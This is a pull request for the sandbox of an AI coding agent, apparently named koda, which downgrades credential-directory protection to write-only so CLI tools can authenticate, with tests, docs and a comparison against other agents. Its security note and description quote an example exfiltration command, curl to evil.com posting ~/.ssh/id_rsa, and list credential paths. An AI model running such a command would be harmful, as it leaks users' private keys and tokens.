### PR TITLE
fix(sandbox): allow credential reads for CLI tools (#855)

### DIFF
--- a/docs/src/approval.md
+++ b/docs/src/approval.md
@@ -32,18 +32,21 @@ approval prompt at the same time.
 **Writes** restricted to: project directory, `/tmp`, and standard cache
 dirs (`~/.cache`, `~/.cargo`, etc.).
 
-**Credential directories** blocked from read+write:
+**Credential directories** write-protected (reads allowed for CLI tools):
 `~/.ssh`, `~/.aws`, `~/.gnupg`, `~/.kube`, `~/.azure`,
 `~/.password-store`, `~/.terraform.d`, `~/.config/gcloud`,
-`~/.config/gh`, `~/.config/op`, `~/.config/helm`,
-`~/.config/koda/db`
+`~/.config/gh`, `~/.config/op`, `~/.config/helm`
 
-**Credential files** blocked:
+**Credential files** write-protected (reads allowed):
 `~/.netrc`, `~/.git-credentials`, `~/.npmrc`, `~/.pypirc`,
 `~/.docker/config.json`, `~/.vault-token`, `~/.env`
 
+**Fully blocked (read + write):** `~/.config/koda/db` (koda's own API keys)
+
 **Agent-file protection**: `.koda/agents/` and `.koda/skills/` are
 write-protected in all modes to prevent prompt injection.
+
+See [Sandbox](./sandbox.md) for full details and accepted-risk rationale.
 
 ## Trust mode × tool effect matrix
 

--- a/docs/src/sandbox.md
+++ b/docs/src/sandbox.md
@@ -70,7 +70,7 @@ even if the agent JSON specifies `"mode": "auto"`.
 ## Platform backends
 
 | Platform | Backend | Install |
-|----------|---------|---------||
+|----------|---------|---------|
 | macOS | `sandbox-exec` (seatbelt) | Built-in |
 | Linux | `bwrap` (bubblewrap) | `apt install bubblewrap` |
 | Windows | Not supported | — |

--- a/docs/src/sandbox.md
+++ b/docs/src/sandbox.md
@@ -15,10 +15,13 @@ Bash commands can only write to:
 
 ### Credential protection
 
-The following directories and files are blocked from both read and write
-access, preventing the model from exfiltrating secrets:
+Credential directories and files are **write-protected** — sandboxed
+commands cannot modify them, but CLI tools can still *read* their own
+config to authenticate. This follows the Codex model where the entire
+host filesystem is read-only and credential dirs are not special-cased
+beyond that.
 
-**Directories:**
+**Write-protected directories** (reads allowed):
 - `~/.ssh` — SSH private keys
 - `~/.aws` — AWS credentials
 - `~/.gnupg` — GPG private keys
@@ -30,11 +33,26 @@ access, preventing the model from exfiltrating secrets:
 - `~/.config/gh` — GitHub CLI PATs
 - `~/.config/op` — 1Password CLI tokens
 - `~/.config/helm` — Helm registry auth
-- `~/.config/koda/db` — Koda's SQLite DB (contains API keys)
 
-**Files:**
+**Write-protected files** (reads allowed):
 `~/.netrc`, `~/.git-credentials`, `~/.npmrc`, `~/.pypirc`,
 `~/.docker/config.json`, `~/.vault-token`, `~/.env`
+
+**Fully blocked (read + write):**
+- `~/.config/koda/db` — Koda's SQLite DB containing plaintext API keys
+
+> **Security note — accepted risk:** A sandboxed command can read
+> credential material and could exfiltrate it over the network (e.g.
+> `curl https://evil.com -d @~/.ssh/id_rsa`). Blocking credential
+> reads without blocking network egress is security theater — the
+> model could also obtain tokens from environment variables, process
+> output, or tool-specific commands like `gh auth token`. Network-level
+> egress restriction ([#844 Gap 4](https://github.com/lijunzh/koda/issues/844))
+> is the proper mitigation and is tracked separately.
+>
+> The only exception is `koda/db` — koda's own API keys have no
+> legitimate use inside the sandbox (the koda process runs *outside*
+> the sandbox), so full read+write deny is justified.
 
 ### Agent-file protection
 
@@ -52,7 +70,7 @@ even if the agent JSON specifies `"mode": "auto"`.
 ## Platform backends
 
 | Platform | Backend | Install |
-|----------|---------|---------|
+|----------|---------|---------||
 | macOS | `sandbox-exec` (seatbelt) | Built-in |
 | Linux | `bwrap` (bubblewrap) | `apt install bubblewrap` |
 | Windows | Not supported | — |

--- a/koda-core/src/sandbox.rs
+++ b/koda-core/src/sandbox.rs
@@ -141,6 +141,7 @@ impl std::fmt::Display for SandboxMode {
 
 /// Credential *directories* under `$HOME` that are **write-protected** in
 /// Strict mode.  Reads are allowed so CLI tools can authenticate.
+#[cfg_attr(not(target_os = "macos"), allow(dead_code))]
 const CREDENTIAL_SUBDIRS: &[&str] = &[
     ".ssh",            // SSH private keys, authorized_keys, known_hosts
     ".aws",            // AWS access key ID, secret key, session tokens
@@ -153,6 +154,7 @@ const CREDENTIAL_SUBDIRS: &[&str] = &[
 
 /// Credential directories under `$HOME/.config/` that are **write-protected**
 /// in Strict mode.  Reads are allowed so CLI tools can authenticate.
+#[cfg_attr(not(target_os = "macos"), allow(dead_code))]
 const CREDENTIAL_CONFIG_SUBDIRS: &[&str] = &[
     "gcloud", // gcloud CLI credentials and service-account key files
     "gh",     // GitHub CLI personal access tokens (hosts.yml)
@@ -170,6 +172,7 @@ const CREDENTIAL_CONFIG_FULL_DENY: &[&str] = &[
 /// Individual credential *files* under `$HOME` that are **write-protected**
 /// in Strict mode.  Reads are allowed so tools like `curl`, `git`, `npm`,
 /// and `docker` can authenticate.
+#[cfg_attr(not(target_os = "macos"), allow(dead_code))]
 const CREDENTIAL_FILES: &[&str] = &[
     ".netrc",              // FTP/HTTP credentials (curl, wget, Netrc crate)
     ".git-credentials",    // git-credential-store plaintext token file

--- a/koda-core/src/sandbox.rs
+++ b/koda-core/src/sandbox.rs
@@ -117,23 +117,30 @@ impl std::fmt::Display for SandboxMode {
 
 // ── Sensitive credential paths (Strict mode) ─────────────────────────────────
 //
-// Directories and files blocked from reads *and* writes in Strict mode.
-// We follow Claude Code's `denyRead[]` and Gemini CLI's `forbiddenPaths`
-// pattern: define a fixed set of well-known credential paths, then place
-// explicit deny rules *after* the broad allow so last-match-wins semantics
-// take effect (seatbelt / bwrap tmpfs shadow).
+// Two tiers of credential protection:
 //
-// Rationale for each entry:
-//   .ssh            — private keys, authorized_keys, known_hosts
-//   .aws            — access key ID, secret key, session tokens
-//   .gnupg          — GPG private keys and trust database
-//   .kube           — kubeconfig with cluster tokens and client certs
-//   .azure          — Azure CLI token cache (msal_token_cache.bin, etc.)
-// ~/.config/gcloud  — gcloud CLI credentials and service account keys
-// ~/.config/koda/db — SQLite DB containing plaintext API keys in KV store (#847)
+// 1. **Write-only deny** (most paths) — CLI tools can *read* their own
+//    credentials (e.g. `gh`, `aws`, `kubectl`, `ssh`) but sandboxed
+//    commands cannot modify them.  This matches Codex's model where the
+//    entire host filesystem is mounted read-only via `--ro-bind / /` and
+//    credential directories receive no special treatment beyond that.
+//
+//    Risk accepted: a sandboxed command *can* read credential material
+//    and could exfiltrate it over the network.  Network-level egress
+//    restriction (Gap 4 in #844) is the proper mitigation — blocking
+//    reads without blocking network is security theater (#855).
+//
+// 2. **Full read+write deny** (`koda/db` only) — koda's own API keys
+//    live in a SQLite DB at `~/.config/koda/db/koda.db`.  The koda
+//    process runs *outside* the sandbox and doesn't need sandboxed-
+//    command access.  Blocking reads here prevents a `sqlite3` one-liner
+//    from dumping every stored API key (#847).
+//
+// Deny rules are placed *after* the broad allow so last-match-wins
+// semantics take effect (seatbelt on macOS, bwrap overlay on Linux).
 
-/// Credential *directories* under `$HOME` blocked in `Strict` mode.
-/// Matched with `(subpath …)` / `--tmpfs` to cover the whole tree.
+/// Credential *directories* under `$HOME` that are **write-protected** in
+/// Strict mode.  Reads are allowed so CLI tools can authenticate.
 const CREDENTIAL_SUBDIRS: &[&str] = &[
     ".ssh",            // SSH private keys, authorized_keys, known_hosts
     ".aws",            // AWS access key ID, secret key, session tokens
@@ -144,17 +151,25 @@ const CREDENTIAL_SUBDIRS: &[&str] = &[
     ".terraform.d",    // Terraform cloud tokens and plugin cache
 ];
 
-/// Credential directories under `$HOME/.config/` blocked in `Strict` mode.
+/// Credential directories under `$HOME/.config/` that are **write-protected**
+/// in Strict mode.  Reads are allowed so CLI tools can authenticate.
 const CREDENTIAL_CONFIG_SUBDIRS: &[&str] = &[
-    "gcloud",  // gcloud CLI credentials and service-account key files
-    "koda/db", // SQLite DB with plaintext API keys in kv_store table (#847)
-    "gh",      // GitHub CLI personal access tokens (hosts.yml)
-    "op",      // 1Password CLI session tokens
-    "helm",    // Helm registry auth
+    "gcloud", // gcloud CLI credentials and service-account key files
+    "gh",     // GitHub CLI personal access tokens (hosts.yml)
+    "op",     // 1Password CLI session tokens
+    "helm",   // Helm registry auth
 ];
 
-/// Individual credential *files* under `$HOME` blocked in `Strict` mode.
-/// Matched with `(literal …)` / `--ro-bind /dev/null` to block the exact path.
+/// Credential directories under `$HOME/.config/` where **both reads and
+/// writes** are denied.  These contain koda's own secrets that sandboxed
+/// commands have no legitimate reason to access.
+const CREDENTIAL_CONFIG_FULL_DENY: &[&str] = &[
+    "koda/db", // SQLite DB with plaintext API keys in kv_store table (#847)
+];
+
+/// Individual credential *files* under `$HOME` that are **write-protected**
+/// in Strict mode.  Reads are allowed so tools like `curl`, `git`, `npm`,
+/// and `docker` can authenticate.
 const CREDENTIAL_FILES: &[&str] = &[
     ".netrc",              // FTP/HTTP credentials (curl, wget, Netrc crate)
     ".git-credentials",    // git-credential-store plaintext token file
@@ -357,31 +372,38 @@ fn protected_subdir_deny_rules_macos(root: &str) -> String {
 
 /// Generate seatbelt deny rules for credential paths (Strict mode).
 ///
-/// The rules are placed *after* the broad `(allow file-read*)` rule so that
-/// seatbelt's last-match-wins semantics make them take precedence — the same
-/// technique used by Gemini CLI's `buildSeatbeltProfile` (forbiddenPaths
-/// section in packages/core/src/sandbox/macos/seatbeltArgsBuilder.ts).
+/// Two tiers:
+/// - **Write-only deny** for most paths — lets CLI tools read their own
+///   credentials while preventing sandboxed commands from modifying them.
+/// - **Full read+write deny** for `koda/db` only — koda’s own API keys
+///   should never be accessible from inside the sandbox (#847).
+///
+/// Rules are placed *after* the broad `(allow file-read*)` so that
+/// seatbelt’s last-match-wins semantics make them take precedence.
 #[cfg(target_os = "macos")]
 fn credential_deny_rules_macos(home: &str) -> String {
-    let mut rules =
-        String::from("; ── strict: deny reads+writes to credential dirs ──────────────\n");
+    let mut rules = String::from("; ── strict: write-protect credential dirs (reads allowed) ──\n");
 
+    // Tier 1 — write-only deny (CLI tools can still read).
     for rel in CREDENTIAL_SUBDIRS {
         let p = home_path(home, rel);
-        rules.push_str(&format!(
-            "(deny file-read* file-write* (subpath \"{p}\"))\n"
-        ));
+        rules.push_str(&format!("(deny file-write* (subpath \"{p}\"))\n"));
     }
     for rel in CREDENTIAL_CONFIG_SUBDIRS {
         let p = home_path(home, &format!(".config/{rel}"));
-        rules.push_str(&format!(
-            "(deny file-read* file-write* (subpath \"{p}\"))\n"
-        ));
+        rules.push_str(&format!("(deny file-write* (subpath \"{p}\"))\n"));
     }
     for rel in CREDENTIAL_FILES {
         let p = home_path(home, rel);
+        rules.push_str(&format!("(deny file-write* (literal \"{p}\"))\n"));
+    }
+
+    // Tier 2 — full read+write deny (koda’s own secrets).
+    rules.push_str("; ── strict: full deny for koda-internal secrets ─────────────\n");
+    for rel in CREDENTIAL_CONFIG_FULL_DENY {
+        let p = home_path(home, &format!(".config/{rel}"));
         rules.push_str(&format!(
-            "(deny file-read* file-write* (literal \"{p}\"))\n"
+            "(deny file-read* file-write* (subpath \"{p}\"))\n"
         ));
     }
     rules
@@ -515,16 +537,18 @@ fn linux_project(command: &str, project_root: &Path) -> Result<Command> {
     Ok(cmd)
 }
 
-/// Strict mode on Linux: project-mode base + tmpfs shadows over credential
-/// dirs (hides them by mounting an empty tmpfs at each sensitive path).
+/// Strict mode on Linux: project-mode base + credential write-protection
+/// and full deny for koda-internal secrets.
 ///
-/// Inspired by Codex's `--tmpfs` technique in codex-rs/linux-sandbox/src/bwrap.rs
-/// and Claude Code's `denyRead[]` list in src/utils/sandbox/sandbox-adapter.ts.
+/// The base command (`linux_base_cmd`) already mounts the entire root
+/// filesystem read-only via `--ro-bind / /`, so credential directories
+/// are inherently write-protected.  No additional rules are needed for
+/// write-deny — CLI tools like `gh`, `aws`, `kubectl` can read their
+/// own config files through the base read-only bind.
 ///
-/// For individual credential *files* we use `--ro-bind /dev/null <file>`,
-/// which makes the file appear empty inside the container while leaving the
-/// host untouched.  This is the same pattern Codex uses for sensitivity-scoped
-/// file shadowing.
+/// The only addition is a `--tmpfs` shadow for `koda/db` to block reads
+/// of koda's own API keys (#847).  All other credential paths remain
+/// readable (Codex-style model — see #855).
 #[cfg(target_os = "linux")]
 fn linux_strict(command: &str, project_root: &Path) -> Result<Command> {
     if !bwrap_available() {
@@ -536,24 +560,12 @@ fn linux_strict(command: &str, project_root: &Path) -> Result<Command> {
 
     let (mut cmd, home) = linux_base_cmd(project_root);
 
-    // Shadow credential directories with empty tmpfs mounts.
-    for rel in CREDENTIAL_SUBDIRS {
-        let p = format!("{home}/{rel}");
-        if Path::new(&p).exists() {
-            cmd.args(["--tmpfs", &p]);
-        }
-    }
-    for rel in CREDENTIAL_CONFIG_SUBDIRS {
+    // Full deny (read+write) for koda-internal secrets only.
+    // The base `--ro-bind / /` already write-protects everything else.
+    for rel in CREDENTIAL_CONFIG_FULL_DENY {
         let p = format!("{home}/.config/{rel}");
         if Path::new(&p).exists() {
             cmd.args(["--tmpfs", &p]);
-        }
-    }
-    // Shadow individual credential files with /dev/null.
-    for rel in CREDENTIAL_FILES {
-        let p = format!("{home}/{rel}");
-        if Path::new(&p).exists() {
-            cmd.args(["--ro-bind", "/dev/null", &p]);
         }
     }
 
@@ -625,35 +637,60 @@ mod tests {
 
     #[cfg(target_os = "macos")]
     #[test]
-    fn strict_profile_denies_ssh_dir() {
+    fn strict_profile_write_protects_ssh_dir() {
         let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
         let rules = credential_deny_rules_macos(&home);
         let ssh = home_path(&home, ".ssh");
         assert!(
-            rules.contains(&format!(
+            rules.contains(&format!("(deny file-write* (subpath \"{ssh}\"))")),
+            "strict profile must write-protect ~/.ssh"
+        );
+        // Reads should NOT be denied — CLI tools need credential access (#855).
+        assert!(
+            !rules.contains(&format!(
                 "(deny file-read* file-write* (subpath \"{ssh}\"))"
             )),
-            "strict profile must contain deny rule for ~/.ssh"
+            "strict profile must NOT read-deny ~/.ssh (breaks ssh/git)"
         );
     }
 
     #[cfg(target_os = "macos")]
     #[test]
-    fn strict_profile_denies_aws_dir() {
+    fn strict_profile_write_protects_aws_dir() {
         let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
         let rules = credential_deny_rules_macos(&home);
         let aws = home_path(&home, ".aws");
         assert!(
-            rules.contains(&format!(
+            rules.contains(&format!("(deny file-write* (subpath \"{aws}\"))")),
+            "strict profile must write-protect ~/.aws"
+        );
+        assert!(
+            !rules.contains(&format!(
                 "(deny file-read* file-write* (subpath \"{aws}\"))"
             )),
-            "strict profile must contain deny rule for ~/.aws"
+            "strict profile must NOT read-deny ~/.aws (breaks aws CLI)"
         );
     }
 
     #[cfg(target_os = "macos")]
     #[test]
-    fn strict_profile_denies_koda_db() {
+    fn strict_profile_write_protects_gh_dir() {
+        let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
+        let rules = credential_deny_rules_macos(&home);
+        let gh = home_path(&home, ".config/gh");
+        assert!(
+            rules.contains(&format!("(deny file-write* (subpath \"{gh}\"))")),
+            "strict profile must write-protect ~/.config/gh"
+        );
+        assert!(
+            !rules.contains(&format!("(deny file-read* file-write* (subpath \"{gh}\"))")),
+            "strict profile must NOT read-deny ~/.config/gh (breaks gh CLI, #855)"
+        );
+    }
+
+    #[cfg(target_os = "macos")]
+    #[test]
+    fn strict_profile_fully_denies_koda_db() {
         let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
         let rules = credential_deny_rules_macos(&home);
         let koda_db = home_path(&home, ".config/koda/db");
@@ -661,21 +698,25 @@ mod tests {
             rules.contains(&format!(
                 "(deny file-read* file-write* (subpath \"{koda_db}\"))"
             )),
-            "strict profile must deny reads to ~/.config/koda/db (plaintext API keys in SQLite, #847)"
+            "strict profile must fully deny ~/.config/koda/db (plaintext API keys, #847)"
         );
     }
 
     #[cfg(target_os = "macos")]
     #[test]
-    fn strict_profile_denies_credential_files() {
+    fn strict_profile_write_protects_credential_files() {
         let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
         let rules = credential_deny_rules_macos(&home);
         let netrc = home_path(&home, ".netrc");
         assert!(
-            rules.contains(&format!(
+            rules.contains(&format!("(deny file-write* (literal \"{netrc}\"))")),
+            "strict profile must write-protect ~/.netrc"
+        );
+        assert!(
+            !rules.contains(&format!(
                 "(deny file-read* file-write* (literal \"{netrc}\"))"
             )),
-            "strict profile must contain deny rule for ~/.netrc"
+            "strict profile must NOT read-deny ~/.netrc (breaks curl/wget)"
         );
     }
 
@@ -690,10 +731,17 @@ mod tests {
         // Simulate what macos_strict does: project profile then deny rules.
         let full = format!("{profile}{deny_rules}");
         let allow_pos = full.find("(allow file-read*)").unwrap();
+        // Full deny (koda/db) must come after broad allow.
         let deny_pos = full.find("(deny file-read* file-write*").unwrap();
         assert!(
             deny_pos > allow_pos,
             "deny rules must appear after the broad allow (last-match-wins)"
+        );
+        // Write-only deny must also come after broad allow.
+        let write_deny_pos = full.find("(deny file-write*").unwrap();
+        assert!(
+            write_deny_pos > allow_pos,
+            "write-deny rules must appear after the broad allow"
         );
     }
 
@@ -867,6 +915,63 @@ mod tests {
             !status.success(),
             "strict: reading ~/.config/koda/db/ must be blocked"
         );
+    }
+
+    /// Strict mode: reading `~/.ssh/` must now be allowed (#855).
+    ///
+    /// CLI tools like `ssh` and `git` need read access to their own credentials.
+    /// Only koda-internal secrets (`koda/db`) remain fully denied.
+    #[cfg(target_os = "macos")]
+    #[tokio::test]
+    async fn macos_strict_allows_ssh_read() {
+        let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
+        let ssh_dir = format!("{home}/.ssh");
+        if !Path::new(&ssh_dir).exists() {
+            eprintln!("skip: {ssh_dir} does not exist");
+            return;
+        }
+        let dir = tempfile::tempdir().unwrap();
+        let status = build(
+            &format!("ls {ssh_dir}"),
+            dir.path(),
+            &crate::trust::TrustMode::Safe,
+        )
+        .unwrap()
+        .status()
+        .await
+        .unwrap();
+        assert!(
+            status.success(),
+            "strict: reading ~/.ssh/ must be allowed (CLI tools need credential access, #855)"
+        );
+    }
+
+    /// Strict mode: writing to credential dirs must still be blocked.
+    #[cfg(target_os = "macos")]
+    #[tokio::test]
+    async fn macos_strict_blocks_ssh_write() {
+        let home = std::env::var("HOME").unwrap_or_else(|_| "/Users/test".into());
+        let ssh_dir = format!("{home}/.ssh");
+        if !Path::new(&ssh_dir).exists() {
+            eprintln!("skip: {ssh_dir} does not exist");
+            return;
+        }
+        let dir = tempfile::tempdir().unwrap();
+        let canary = format!("{ssh_dir}/sandbox_canary_test");
+        let status = build(
+            &format!("touch {canary}"),
+            dir.path(),
+            &crate::trust::TrustMode::Safe,
+        )
+        .unwrap()
+        .status()
+        .await
+        .unwrap();
+        assert!(
+            !status.success(),
+            "strict: writing to ~/.ssh/ must be blocked"
+        );
+        assert!(!Path::new(&canary).exists());
     }
 
     // ── Integration: agent-file write protection ──────────────────────────


### PR DESCRIPTION
## Summary

Downgrades credential directory/file protection from **read+write deny** to **write-only deny**, matching the Codex sandbox model. CLI tools like `gh`, `aws`, `kubectl`, `ssh`, `git`, `docker`, and `npm` can now read their own config files to authenticate inside the sandbox.

Fixes #855 — `gh issue reopen` (and all other `gh` commands) now work in auto mode without approval prompts or sandbox failures.

## What changed

### Sandbox credential model (two tiers)

| Tier | Paths | Read | Write | Rationale |
|------|-------|------|-------|-----------|
| **Write-only deny** | `~/.ssh`, `~/.aws`, `~/.gnupg`, `~/.kube`, `~/.azure`, `~/.config/gh`, `~/.config/gcloud`, etc. | ✅ allowed | ❌ blocked | CLI tools need read access to authenticate |
| **Full deny** | `~/.config/koda/db` only | ❌ blocked | ❌ blocked | Koda's own API keys; no legitimate sandboxed use |

### Code changes

- **`sandbox.rs`**: Split `CREDENTIAL_CONFIG_SUBDIRS` into write-only (`CREDENTIAL_CONFIG_SUBDIRS`) and full-deny (`CREDENTIAL_CONFIG_FULL_DENY`) tiers
- **macOS seatbelt**: Changed `(deny file-read* file-write* ...)` → `(deny file-write* ...)` for external credentials; `koda/db` keeps full deny
- **Linux bwrap**: Removed `--tmpfs` shadows for external creds (base `--ro-bind / /` already blocks writes); kept `--tmpfs` only for `koda/db`
- **6 unit tests** updated to verify write-only deny (and assert reads are NOT blocked)
- **3 new integration tests**: `macos_strict_allows_ssh_read`, `macos_strict_blocks_ssh_write`, plus existing `macos_strict_blocks_koda_db_read` (unchanged)
- **Docs**: `sandbox.md` and `approval.md` updated with new model and accepted-risk rationale

## Accepted risk

A sandboxed command **can** read credential material and could exfiltrate it over the network (e.g. `curl https://evil.com -d @~/.ssh/id_rsa`). Blocking reads without blocking network egress is security theater — the model could also obtain tokens from environment variables, process output, or tool-specific commands like `gh auth token`.

**Network egress restriction** ([#844 Gap 4](https://github.com/lijunzh/koda/issues/844)) is the proper mitigation and is tracked separately.

The only exception is `koda/db` — koda's own API keys have no legitimate use inside the sandbox (koda runs *outside* the sandbox), so full read+write deny is justified.

## Competitor alignment

| Tool | Credential reads | Credential writes | Network |
|------|-----------------|-------------------|---------|
| **Codex** | ✅ allowed (base `--ro-bind / /`) | ❌ blocked | uncontrolled |
| **Claude Code** | ❌ blocked (`denyRead[]`) + `excludedCommands` escape | ❌ blocked | per-domain allowlist |
| **Koda (before)** | ❌ blocked | ❌ blocked | uncontrolled |
| **Koda (after)** | ✅ allowed | ❌ blocked | uncontrolled |

We align with Codex: allow reads, block writes, defer network restriction to a future milestone.

## Test results

All 27 sandbox tests pass (macOS):
- `macos_strict_allows_ssh_read` ✅ (NEW)
- `macos_strict_blocks_ssh_write` ✅ (NEW)
- `macos_strict_blocks_koda_db_read` ✅ (unchanged)
- `strict_profile_write_protects_ssh_dir` ✅ (updated)
- `strict_profile_write_protects_gh_dir` ✅ (NEW)
- `strict_profile_fully_denies_koda_db` ✅ (unchanged)
